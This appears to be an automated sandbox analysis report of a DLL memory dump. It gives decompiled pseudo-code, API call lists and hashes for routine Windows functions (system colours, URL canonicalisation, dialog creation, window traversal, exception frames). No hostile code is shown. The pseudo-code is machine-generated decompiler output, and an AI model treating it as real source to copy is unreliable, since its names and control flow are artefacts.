__lock.LIBCMT ref: 10017BE4
InterlockedDecrement.KERNEL32(?), ref: 10017C01
InterlockedIncrement.KERNEL32(04771620), ref: 10017C2C

Strings

Pqxt, xrefs: 10017C2C

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID: Pqxt
API String ID: 4271482742-267686914
Opcode ID: f32fc0bda93a51fbeada6e706c3c85128957a503186ed3e1281e3a41e897d60d
Instruction ID: 647136069854021f3080b83825f16cc548fcfaf4739303922027080a8afeb28e
Opcode Fuzzy Hash: f32fc0bda93a51fbeada6e706c3c85128957a503186ed3e1281e3a41e897d60d
Instruction Fuzzy Hash: C3015B35908A21ABD712DB688C8578D77B0FF04761F124019E9096F292DB34EAC1CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 1000FDA5, Relevance: 10.5, APIs: 7, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FDA5(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1000fdb1
0x1000fdb7
0x1000fdbe
0x1000fdc5
0x1000fdcc
0x1000fdd9
0x1000fde0
0x1000fde3
0x1000fde6
0x1000fdea

APIs

GetSysColor.USER32(0000000F), ref: 1000FDB3
GetSysColor.USER32(00000010), ref: 1000FDBA
GetSysColor.USER32(00000014), ref: 1000FDC1
GetSysColor.USER32(00000012), ref: 1000FDC8
GetSysColor.USER32(00000006), ref: 1000FDCF
GetSysColorBrush.USER32(0000000F), ref: 1000FDDC
GetSysColorBrush.USER32(00000006), ref: 1000FDE3

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: baf91eb31c43e8399f42971573647b3b813dc826a8f05d3d91007a16ad92c4fa
Instruction ID: b693d72d5859f62eea8dca98044d4cf849e0fc22f3920c8e5afb32953d406a5c
Opcode Fuzzy Hash: baf91eb31c43e8399f42971573647b3b813dc826a8f05d3d91007a16ad92c4fa
Instruction Fuzzy Hash: D8F012719417449BE730BF724D49B47BAD5FFC4B10F12092EE2458B990D6B6E441DF40

Uniqueness

Uniqueness Score: -1.00%

Function 1000582A, Relevance: 9.1, APIs: 6, Instructions: 147
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000582A(short* __edx, char* _a4, struct _SYSTEMTIME _a8, intOrPtr* _a12, short* _a16, signed int _a20) {
				signed int _v8;
				char _v2092;
				intOrPtr* _v2096;
				char* _v2100;
				long _v2104;
				int _v2108;
				char* _v2112;
				char* _v2116;
				char* _v2120;
				short* _v2124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				long _t60;
				long _t63;
				char* _t64;
				int _t65;
				struct _SYSTEMTIME _t67;
				void* _t68;
				long _t70;
				long _t71;
				long _t72;
				long _t73;
				long _t74;
				long _t75;
				char* _t77;
				intOrPtr* _t81;
				void* _t88;
				char* _t89;
				void* _t91;
				long _t93;
				signed int _t97;

				_t86 = __edx;
				_t95 = _t97;
				_t48 =  *0x10031c30; // 0x1f496801
				_v8 = _t48 ^ _t97;
				_t77 = _a4;
				_v2096 = _a12;
				_t67 = _a8;
				_v2124 = _a16;
				_v2108 = _t77;
				if(_t67 == 0 || _t77 == 0) {
					L14:
					_t53 = 0;
					goto L15;
				} else {
					_t93 = _a20 & 0x2e000000;
					_v2104 = 0x824;
					_v2100 = 0;
					_v2112 = 0;
					_v2116 = 0;
					if((_a20 & 0x90000000) != 0 &&  *((intOrPtr*)(_t67 + 0x30)) != 0) {
						if((_a20 & 0x02000000) == 0) {
							_v2112 = 0x80000000;
						} else {
							_v2116 = 1;
						}
					}
					_t89 = InternetCanonicalizeUrlA;
					if(InternetCanonicalizeUrlA(_t77,  &_v2092,  &_v2104, _t93) != 0) {
						_t89 =  &_v2092;
						goto L18;
					} else {
						_t63 = GetLastError();
						_t106 = _t63 - 0x7a;
						if(_t63 != 0x7a) {
							goto L14;
						}
						_t64 = E10003B46(_t106, _v2104);
						_v2120 = _t64;
						if(_t64 == 0) {
							goto L14;
						}
						_v2100 = 1;
						_t65 = InternetCanonicalizeUrlA(_v2108, _t64,  &_v2104, _t93);
						_t108 = _t65;
						if(_t65 != 0) {
							_t89 = _v2120;
							L18:
							_t93 = 0;
							_v2108 = InternetCrackUrlA(_t89, 0, _v2112, _t67);
							__eflags = _v2116;
							if(_v2116 == 0) {
								L23:
								__eflags = _v2100 - _t93;
								if(__eflags != 0) {
									E10003B75(_t67, _t89, _t93, __eflags, _t89);
								}
								_t53 = _v2108;
								__eflags = _v2108 - _t93;
								if(_v2108 != _t93) {
									_t86 = _v2124;
									 *_v2124 =  *((intOrPtr*)(_t67 + 0x18));
									_t70 =  *((intOrPtr*)(_t67 + 0xc)) - 1;
									__eflags = _t70;
									_t81 = _v2096;
									if(_t70 == 0) {
										 *_t81 = 1;
										L15:
										_pop(_t88);
										_pop(_t91);
										_pop(_t68);
										return E100127FF(_t53, _t68, _v8 ^ _t95, _t86, _t88, _t91);
									}
									_t71 = _t70 - 1;
									__eflags = _t71;
									if(_t71 == 0) {
										 *_t81 = 2;
										goto L15;
									}
									_t72 = _t71 - 1;
									__eflags = _t72;
									if(_t72 == 0) {
										 *_t81 = 3;
										goto L15;
									}
									_t73 = _t72 - 1;
									__eflags = _t73;
									if(_t73 == 0) {
										 *_t81 = 0x100b;
										goto L15;
									}
									_t74 = _t73 - 1;
									__eflags = _t74;
									if(_t74 == 0) {
										 *_t81 = 0x1001;
										goto L15;
									}
									_t75 = _t74 - 1;
									__eflags = _t75;
									if(_t75 == 0) {
										 *_t81 = 0x1006;
										goto L15;
									}
									__eflags = _t75 != 1;
									if(_t75 != 1) {
										L27:
										 *_t81 = 0x1000;
										goto L15;
									}
									 *_t81 = 0x1002;
									goto L15;
								}
								_t81 = _v2096;
								goto L27;
							}
							_t60 = UrlUnescapeA( *(_t67 + 0x2c), 0, 0, 0x2100000);
							__eflags = _t60;
							if(_t60 >= 0) {
								 *((intOrPtr*)(_t67 + 0x30)) = lstrlenA( *(_t67 + 0x2c));
								goto L23;
							}
							__eflags = _v2100;
							if(__eflags == 0) {
								goto L14;
							}
							_push(_t89);
							L13:
							E10003B75(_t67, _t89, _t93, _t108);
							goto L14;
						}
						_push(_v2120);
						goto L13;
					}
				}
			}

0x1000582a
0x1000582d
0x10005835
0x1000583c
0x10005842
0x10005845
0x1000584f
0x10005852
0x1000585c
0x10005864
0x1000592c
0x1000592c
0x00000000
0x10005872
0x10005875
0x10005882
0x1000588c
0x10005892
0x10005898
0x1000589e
0x100058ac
0x100058ba
0x100058ae
0x100058ae
0x100058ae
0x100058ac
0x100058c4
0x100058de
0x1000593f
0x00000000
0x100058e0
0x100058e0
0x100058e6
0x100058e9
0x00000000
0x00000000
0x100058f1
0x100058f7
0x100058ff
0x00000000
0x00000000
0x10005910
0x1000591a
0x1000591c
0x1000591e
0x10005947
0x1000594d
0x10005954
0x1000595e
0x10005964
0x1000596a
0x10005997
0x10005997
0x1000599d
0x100059a0
0x100059a5
0x100059a6
0x100059ac
0x100059ae
0x100059c5
0x100059cb
0x100059d1
0x100059d1
0x100059d2
0x100059d8
0x10005a2e
0x1000592e
0x10005931
0x10005932
0x10005935
0x1000593c
0x1000593c
0x100059da
0x100059da
0x100059db
0x10005a23
0x00000000
0x10005a23
0x100059dd
0x100059dd
0x100059de
0x10005a18
0x00000000
0x10005a18
0x100059e0
0x100059e0
0x100059e1
0x10005a0d
0x00000000
0x10005a0d
0x100059e3
0x100059e3
0x100059e4
0x10005a02
0x00000000
0x10005a02
0x100059e6
0x100059e6
0x100059e7
0x100059f7
0x00000000
0x100059f7
0x100059e9
0x100059ea
0x100059b6
0x100059b6
0x00000000
0x100059b6
0x100059ec
0x00000000
0x100059ec
0x100059b0
0x00000000
0x100059b0
0x10005976
0x1000597c
0x1000597e
0x10005994
0x00000000
0x10005994
0x10005980
0x10005986
0x00000000
0x00000000
0x10005988
0x10005926
0x10005926
0x00000000
0x1000592b
0x10005920
0x00000000
0x10005920
0x100058de

APIs

InternetCanonicalizeUrlA.WININET(?,?,00000824,?), ref: 100058DA
GetLastError.KERNEL32 ref: 100058E0
InternetCanonicalizeUrlA.WININET(?,00000000,00000824,?), ref: 1000591A
InternetCrackUrlA.WININET(?,00000000,?,?), ref: 10005958
UrlUnescapeA.SHLWAPI(?,00000000,00000000,02100000), ref: 10005976
lstrlenA.KERNEL32(?), ref: 1000598E

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Canonicalize$CrackErrorLastUnescapelstrlen
String ID:
API String ID: 2961774178-0
Opcode ID: 069bd8f5b1566d84bb5732e816ae994b161d50bee20542de4c5ff92da6299247
Instruction ID: 023f4cec4ec7a412c7cca48a7367048c48798fb3299c005839131dd99ba2b16e
Opcode Fuzzy Hash: 069bd8f5b1566d84bb5732e816ae994b161d50bee20542de4c5ff92da6299247
Instruction Fuzzy Hash: F0514F75901219DBEB61DF20CC80B9F7BF4FB457D1F208195E888A6258DB729E81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000D575, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000D575(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t60;
				signed int _t65;
				signed int _t68;
				struct HWND__* _t69;
				signed int _t72;
				signed int _t102;
				void* _t113;
				signed int _t116;
				DLGTEMPLATE* _t117;
				struct HWND__* _t118;
				intOrPtr* _t120;
				void* _t121;

				_t115 = __edi;
				_t113 = __edx;
				_t96 = __ecx;
				_push(0x3c);
				E100139AB(E100259FE, __ebx, __edi, __esi);
				_t120 = __ecx;
				 *((intOrPtr*)(_t121 - 0x20)) = __ecx;
				_t125 =  *(_t121 + 0x10);
				if( *(_t121 + 0x10) == 0) {
					 *(_t121 + 0x10) =  *(E10006DEC(0, __edi, __ecx, _t125) + 0xc);
				}
				_t116 =  *(E10006DEC(0, _t115, _t120, _t125) + 0x3c);
				 *(_t121 - 0x28) = _t116;
				 *(_t121 - 0x14) = 0;
				 *(_t121 - 4) = 0;
				E1000BEC8(0, _t96, _t116, _t120, _t125, 0x10);
				E1000BEC8(0, _t96, _t116, _t120, _t125, 0x3c000);
				if(_t116 == 0) {
					_t117 =  *(_t121 + 8);
					L7:
					__eflags = _t117;
					if(__eflags == 0) {
						L4:
						_t60 = 0;
						L26:
						return E10013A50(_t60);
					}
					E10001C28(_t121 - 0x1c);
					 *(_t121 - 4) = 1;
					 *((intOrPtr*)(_t121 - 0x18)) = 0;
					_t65 = E1001157A(__eflags, _t117, _t121 - 0x1c, _t121 - 0x18);
					__eflags = _t65;
					__eflags = 0 | _t65 == 0x00000000;
					if(__eflags != 0) {
						_push(_t117);
						E1001153E(0, _t121 - 0x38, _t117);
						 *(_t121 - 4) = 2;
						E1001149A(_t121 - 0x38,  *((intOrPtr*)(_t121 - 0x18)));
						 *(_t121 - 0x14) = E100111A7(_t121 - 0x38);
						 *(_t121 - 4) = 1;
						E10011199(_t121 - 0x38);
						__eflags =  *(_t121 - 0x14);
						if(__eflags != 0) {
							_t117 = GlobalLock( *(_t121 - 0x14));
						}
					}
					 *(_t120 + 0x44) =  *(_t120 + 0x44) | 0xffffffff;
					 *(_t120 + 0x3c) =  *(_t120 + 0x3c) | 0x00000010;
					E1000B094(__eflags, _t120);
					_t68 =  *(_t121 + 0xc);
					__eflags = _t68;
					if(_t68 != 0) {
						_t69 =  *(_t68 + 0x20);
					} else {
						_t69 = 0;
					}
					_t118 = CreateDialogIndirectParamA( *(_t121 + 0x10), _t117, _t69, E1000CFB3, 0);
					E100010A3( *((intOrPtr*)(_t121 - 0x1c)) + 0xfffffff0, _t113);
					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
					_t102 =  *(_t121 - 0x28);
					__eflags = _t102;
					if(__eflags != 0) {
						__eflags = _t118;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t102 + 0x18))(_t121 - 0x48);
							 *((intOrPtr*)( *_t120 + 0x134))(0);
						}
					}
					_t72 = E100095F7(__eflags);
					__eflags = _t72;
					if(_t72 == 0) {
						 *((intOrPtr*)( *_t120 + 0x11c))();
					}
					__eflags = _t118;
					if(_t118 != 0) {
						__eflags =  *(_t120 + 0x3c) & 0x00000010;
						if(( *(_t120 + 0x3c) & 0x00000010) == 0) {
							DestroyWindow(_t118);
							_t118 = 0;
							__eflags = 0;
						}
					}
					__eflags =  *(_t121 - 0x14);
					if( *(_t121 - 0x14) != 0) {
						GlobalUnlock( *(_t121 - 0x14));
						GlobalFree( *(_t121 - 0x14));
					}
					__eflags = _t118;
					_t54 = _t118 != 0;
					__eflags = _t54;
					_t60 = 0 | _t54;
					goto L26;
				}
				_push(_t121 - 0x48);
				if( *((intOrPtr*)( *_t120 + 0x134))() != 0) {
					_t117 =  *((intOrPtr*)( *_t116 + 0x14))(_t121 - 0x48,  *(_t121 + 8));
					goto L7;
				}
				goto L4;
			}

0x1000d575
0x1000d575
0x1000d575
0x1000d575
0x1000d57c
0x1000d581
0x1000d583
0x1000d588
0x1000d58b
0x1000d595
0x1000d595
0x1000d59d
0x1000d5a2
0x1000d5a5
0x1000d5a8
0x1000d5ab
0x1000d5b5
0x1000d5bc
0x1000d5e9
0x1000d5ec
0x1000d5ec
0x1000d5ee
0x1000d5d0
0x1000d5d0
0x1000d723
0x1000d728
0x1000d728
0x1000d5f3
0x1000d601
0x1000d605
0x1000d608
0x1000d612
0x1000d619
0x1000d61b
0x1000d61d
0x1000d621
0x1000d62c
0x1000d630
0x1000d640
0x1000d643
0x1000d647
0x1000d64c
0x1000d64f
0x1000d65a
0x1000d65a
0x1000d64f
0x1000d65c
0x1000d660
0x1000d665
0x1000d66a
0x1000d66d
0x1000d66f
0x1000d675
0x1000d671
0x1000d671
0x1000d671
0x1000d68f
0x1000d691
0x1000d696
0x1000d6c0
0x1000d6c3
0x1000d6c5
0x1000d6c7
0x1000d6c9
0x1000d6d1
0x1000d6d9
0x1000d6d9
0x1000d6c9
0x1000d6df
0x1000d6e4
0x1000d6e6
0x1000d6ec
0x1000d6ec
0x1000d6f2
0x1000d6f4
0x1000d6f6
0x1000d6fa
0x1000d6fd
0x1000d703
0x1000d703
0x1000d703
0x1000d6fa
0x1000d705
0x1000d708
0x1000d70d
0x1000d716
0x1000d716
0x1000d71e
0x1000d720
0x1000d720
0x1000d720
0x00000000
0x1000d720
0x1000d5c3
0x1000d5ce
0x1000d5e5
0x00000000
0x1000d5e5
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 1000D57C
GlobalLock.KERNEL32 ref: 1000D654
CreateDialogIndirectParamA.USER32(?,?,?,Function_0000CFB3,00000000), ref: 1000D683
DestroyWindow.USER32(00000000), ref: 1000D6FD
GlobalUnlock.KERNEL32(?), ref: 1000D70D
GlobalFree.KERNEL32 ref: 1000D716

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: c913e50ce1e0f8d66733211b5edb16b5b67b94db0d0003ba50823d3e55dcd28e
Instruction ID: c0a1e311f6c69b58db53f0e32ea15bfdc998bc4955e63ab6d566e80b58d41db7
Opcode Fuzzy Hash: c913e50ce1e0f8d66733211b5edb16b5b67b94db0d0003ba50823d3e55dcd28e
Instruction Fuzzy Hash: D451903590024ADFEB04EFA4C8859EEBBF5FF44394F11042EF516A7195DB31AA41CB21

Uniqueness

Uniqueness Score: -1.00%

Function 10005375, Relevance: 9.1, APIs: 6, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005375(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t8;
				void* _t14;
				struct HWND__** _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t18, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t17 = _t18;
						_t8 = _t18;
						if(_t18 == 0) {
							L10:
							if(_a4 == 0 && _t18 != 0) {
								_t18 = GetLastActivePopup(_t18);
							}
							_t16 = _a8;
							if(_t16 != 0) {
								if(_t17 == 0 || IsWindowEnabled(_t17) == 0 || _t17 == _t18) {
									 *_t16 =  *_t16 & 0x00000000;
								} else {
									 *_t16 = _t17;
									EnableWindow(_t17, 0);
								}
							}
							return _t18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t17 = _t8;
							_t8 = GetParent(_t8);
						} while (_t8 != 0);
						goto L10;
					}
					_t18 = GetParent(_t18);
					L7:
					if(_t18 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t14 = E10005286();
				if(_t14 != 0) {
					L4:
					_t18 =  *(_t14 + 0x20);
					goto L7;
				}
				_t14 = E10005329();
				if(_t14 != 0) {
					goto L4;
				}
				_t18 = 0;
				goto L8;
			}

0x10005382
0x10005388
0x100053a5
0x100053b3
0x100053be
0x100053be
0x100053c0
0x100053c4
0x100053cf
0x100053d3
0x100053e0
0x100053e0
0x100053e2
0x100053e7
0x100053eb
0x10005409
0x100053fc
0x100053ff
0x10005401
0x10005401
0x100053eb
0x10005412
0x00000000
0x00000000
0x00000000
0x100053c6
0x100053c6
0x100053c7
0x100053c9
0x100053cb
0x00000000
0x100053c6
0x100053b8
0x100053ba
0x100053bc
0x00000000
0x00000000
0x00000000
0x100053bc
0x1000538a
0x10005391
0x100053a0
0x100053a0
0x00000000
0x100053a0
0x10005393
0x1000539a
0x00000000
0x00000000
0x1000539c
0x00000000

APIs

GetWindowLongA.USER32 ref: 100053A8
GetParent.USER32(?), ref: 100053B6
GetParent.USER32(?), ref: 100053C9
GetLastActivePopup.USER32(?), ref: 100053DA
IsWindowEnabled.USER32(?), ref: 100053EE
EnableWindow.USER32(?,00000000), ref: 10005401

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: e6e5bea464b0fdf74d24bcb28a823a7d6dc6ed6e8b93b9246f88ddd536886c14
Instruction ID: 00fb714376631491d4460da86e907d490e3039a2c073c0cdca7cd0abbee62f3d
Opcode Fuzzy Hash: e6e5bea464b0fdf74d24bcb28a823a7d6dc6ed6e8b93b9246f88ddd536886c14
Instruction Fuzzy Hash: 8D11BF326012329BF762CA598C80B5F76D8EF44AE3F220115ED44A728CDBB2DE4242D1

Uniqueness

Uniqueness Score: -1.00%

Function 1001C4A6, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001C4A6(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_t53 = __edx;
				_push(0x2c);
				_push(0x1002e610);
				E10013B28(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E10013873(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E10018651(__ecx, __edx, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E10018651(_t48, __edx, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E10018651(_t48, _t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E10018651(_t48, _t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E10013918(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E1001C5CC(_t48, _t53, _t55, _t57, _t61);
				return E10013B6D( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x1001c4a6
0x1001c4a6
0x1001c4a6
0x1001c4a8
0x1001c4ad
0x1001c4b2
0x1001c4b4
0x1001c4b7
0x1001c4ba
0x1001c4bd
0x1001c4c4
0x1001c4d5
0x1001c4e3
0x1001c4f1
0x1001c4f9
0x1001c507
0x1001c50d
0x1001c514
0x1001c517
0x1001c52d
0x1001c530
0x1001c5a5
0x1001c5ac
0x1001c5b3
0x1001c5c0

APIs

__CreateFrameInfo.LIBCMT ref: 1001C4CE

Part of subcall function 10013873: __getptd.LIBCMT ref: 10013881
Part of subcall function 10013873: __getptd.LIBCMT ref: 1001388F

__getptd.LIBCMT ref: 1001C4D8

Part of subcall function 10018651: __getptd_noexit.LIBCMT ref: 10018654
Part of subcall function 10018651: __amsg_exit.LIBCMT ref: 10018661

__getptd.LIBCMT ref: 1001C4E6
__getptd.LIBCMT ref: 1001C4F4
__getptd.LIBCMT ref: 1001C4FF
_CallCatchBlock2.LIBCMT ref: 1001C525

Part of subcall function 10013918: __CallSettingFrame@12.LIBCMT ref: 10013964

Part of subcall function 1001C5CC: __getptd.LIBCMT ref: 1001C5DB
Part of subcall function 1001C5CC: __getptd.LIBCMT ref: 1001C5E9

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 2eb0fc58e1fb8d43a542604a559826bdee8411bf5ecdaf5e55a3349d1d60f530
Instruction ID: 744cf9b398f0bf9e37d912711e144b42968e8e33c1e69693bcaf567e8c90f86b
Opcode Fuzzy Hash: 2eb0fc58e1fb8d43a542604a559826bdee8411bf5ecdaf5e55a3349d1d60f530
Instruction Fuzzy Hash: 4E11D7B5C00209DFDF00DFA4D84AA9D7BB1FF04314F108569F814AB251DB38EA919F54

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC74, Relevance: 9.0, APIs: 6, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E1000FC74(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_push(5);
				_push(_a4);
				while(1) {
					_t12 = GetWindow();
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_push(2);
					_push(_t21);
				}
				return _t12;
			}

0x1000fc85
0x1000fc91
0x1000fc93
0x1000fcd8
0x1000fcd8
0x1000fcda
0x1000fcde
0x00000000
0x00000000
0x1000fca4
0x1000fcbb
0x1000fcc1
0x1000fcd3
0x00000000
0x1000fce6
0x1000fcd3
0x1000fcd5
0x1000fcd7
0x1000fcd7
0x1000fce3

APIs

ClientToScreen.USER32(?,?), ref: 1000FC85
GetDlgCtrlID.USER32(00000000), ref: 1000FC99
GetWindowLongA.USER32 ref: 1000FCA9
GetWindowRect.USER32 ref: 1000FCBB
PtInRect.USER32(?,?,?), ref: 1000FCCB
GetWindow.USER32(?,00000005), ref: 1000FCD8

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 0e6aa46b417009f9197c81cc611530d000a59a26786427e3728b5f1d75e9b25c
Instruction ID: 3e3681908aa9e6063c7850c63348347c4b9e38ffb2e9602217c24740f4cb481d
Opcode Fuzzy Hash: 0e6aa46b417009f9197c81cc611530d000a59a26786427e3728b5f1d75e9b25c
Instruction Fuzzy Hash: 3A014F3250022ABBFB11DB548D4AEEE3B6CFF457A0F100124FD15965A4D730DA52AB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000BEC8, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244
COMMON

